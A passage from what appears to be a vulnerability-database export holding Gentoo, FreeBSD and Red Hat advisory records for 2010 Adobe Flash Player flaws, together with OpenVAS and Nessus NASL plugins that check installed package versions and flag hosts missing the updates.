useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Adobe Flash Player might allow remote attackers\n to execute arbitrary code or cause a Denial of Service.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest stable\n version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-10.1.102.64'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201101-09\nhttp://bugs.gentoo.org/show_bug.cgi?id=307749\nhttp://bugs.gentoo.org/show_bug.cgi?id=322855\nhttp://bugs.gentoo.org/show_bug.cgi?id=332205\nhttp://bugs.gentoo.org/show_bug.cgi?id=337204\nhttp://bugs.gentoo.org/show_bug.cgi?id=343089\nhttp://www.adobe.com/support/security/bulletins/apsb10-06.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-14.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-16.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-22.html\nhttp://www.adobe.com/support/security/bulletins/apsb10-26.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201101-09.\";\n\n \n \n\nif(description)\n{\n script_id(69045);\n script_version(\"$Revision: 7052 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-04 13:50:51 +0200 (Mon, 04 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-09 05:54:11 +0100 (Wed, 09 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-0186\", \"CVE-2010-0187\", \"CVE-2010-0209\", \"CVE-2010-1297\", \"CVE-2010-2160\", \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\", \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\", \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\", \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\", \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2884\", \"CVE-2010-3636\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n script_name(\"Gentoo Security Advisory GLSA 201101-09 (adobe-flash)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.1.102.64\"), vulnerable: make_list(\"lt 10.1.102.64\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:04", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3676", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "\nAdobe Product Security Incident Response Team reports:\n\nCritical vulnerabilities have been identified in\n\t Adobe Flash Player 10.1.85.3 and earlier versions for\n\t Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player\n\t 10.1.95.1 for Android. These vulnerabilities, including\n\t CVE-2010-3654 referenced in Security Advisory APSA10-05,\n\t could cause the application to crash and could potentially\n\t allow an attacker to take control of the affected system.\n\n", "edition": 4, "modified": "2010-09-28T00:00:00", "published": "2010-09-28T00:00:00", "id": "76B597E4-E9C6-11DF-9E10-001B2134EF46", "href": "https://vuxml.freebsd.org/freebsd/76b597e4-e9c6-11df-9e10-001b2134ef46.html", "title": "linux-flashplugin -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:08:27", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 4 Extras.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 9.0.289.0.", "edition": 25, "published": "2013-01-24T00:00:00", "title": "RHEL 4 : flash-plugin (RHSA-2010:0834)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:4.8"], "id": "REDHAT-RHSA-2010-0834.NASL", "href": "https://www.tenable.com/plugins/nessus/63957", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0834. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63957);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\");\n script_bugtraq_id(44504, 44675, 44677, 44678, 44679, 44680, 44681, 44682, 44683, 44684, 44685, 44686, 44687, 44691, 44692);\n script_xref(name:\"RHSA\", value:\"2010:0834\");\n\n script_name(english:\"RHEL 4 : flash-plugin (RHSA-2010:0834)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 4 Extras.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 9.0.289.0.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3636.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3641.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3642.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3643.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3644.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3645.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3646.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3647.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3648.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3649.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3650.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3652.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3654.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0834.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"flash-plugin-9.0.289.0-1.el4\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"flash-plugin-9.0.289.0-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:08:26", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.", "edition": 27, "published": "2013-01-24T00:00:00", "title": "RHEL 5 : flash-plugin (RHSA-2010:0829)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin"], "id": "REDHAT-RHSA-2010-0829.NASL", "href": "https://www.tenable.com/plugins/nessus/63956", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0829. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63956);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\");\n script_bugtraq_id(44504, 44675, 44677, 44678, 44679, 44680, 44681, 44682, 44683, 44684, 44685, 44686, 44687, 44691, 44692);\n script_xref(name:\"RHSA\", value:\"2010:0829\");\n\n script_name(english:\"RHEL 5 : flash-plugin (RHSA-2010:0829)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3640\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3643\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3644\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3649\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3654\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-26.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0829\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0829\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.1.102.64-1.el5\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:08:31", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.", "edition": 26, "published": "2010-11-18T00:00:00", "title": "RHEL 6 : flash-plugin (RHSA-2010:0867)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", 